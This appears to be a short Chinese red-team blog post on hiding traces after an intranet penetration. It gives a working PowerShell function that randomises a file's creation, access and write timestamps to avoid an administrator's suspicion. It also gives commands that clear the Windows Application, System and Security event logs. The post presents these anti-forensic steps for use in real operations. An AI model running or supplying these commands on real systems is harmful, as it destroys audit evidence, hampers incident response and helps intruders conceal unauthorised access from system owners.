内网渗透结束后,一些痕迹清理的小手段

  • A+
所属分类:安全闲碎

渗透攻击红队

一个专注于红队攻击的公众号

内网渗透结束后,一些痕迹清理的小手段


大家好,这里是 渗透攻击红队 的第 51 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新


内网渗透结束后,一些痕迹清理的小手段
痕迹清理


在我们做完一系列的内网渗透操作后,必然会留下一些蛛丝马迹,因此我们需要给自己”擦屁股“。本篇只介绍如何清除系统日志、修改文件时间戳。


痕迹清理

Powershell 修改文件时间戳


有时候我们在登陆目标桌面后,根据需求可能会动用目标主机上的文件或者文件夹,而一些管理员很久都不会登陆一次主机;设想当管理员一上线看到自己的文件夹日期有异常,是否会怀疑?

Function edit_time($path){$date1 =Get-ChildItem | Select LastWriteTime|Get-Random;$date2 =Get-ChildItem |Select LastWriteTime|Get-Random;$date3 =Get-ChildItem |Select LastWriteTime|Get-Random;$(Get-Item $path).lastaccesstime=$date1.LastWriteTime;$(Get-Item $path).creationtime=$date2.LastWriteTime ;$(Get-Item $path).lastwritetime=$date3.LastWriteTime};edit_time("C:UserssaulGoodmanDesktop工具包pass.txt")

内网渗透结束后,一些痕迹清理的小手段


Powershell 清除系统日志


当我们做了一些操作都会记录到时间查看器里,而下面的 Powershell 就可清除相关日志:

PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}

内网渗透结束后,一些痕迹清理的小手段

本篇只讲了两个小技巧,在实战中够用一些了,之后有空在发其他技巧


内网渗透结束后,一些痕迹清理的小手段

渗透攻击红队

一个专注于渗透红队攻击的公众号

内网渗透结束后,一些痕迹清理的小手段



内网渗透结束后,一些痕迹清理的小手段
点分享
内网渗透结束后,一些痕迹清理的小手段
点点赞
内网渗透结束后,一些痕迹清理的小手段
点在看

本文始发于微信公众号(渗透攻击红队):内网渗透结束后,一些痕迹清理的小手段

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: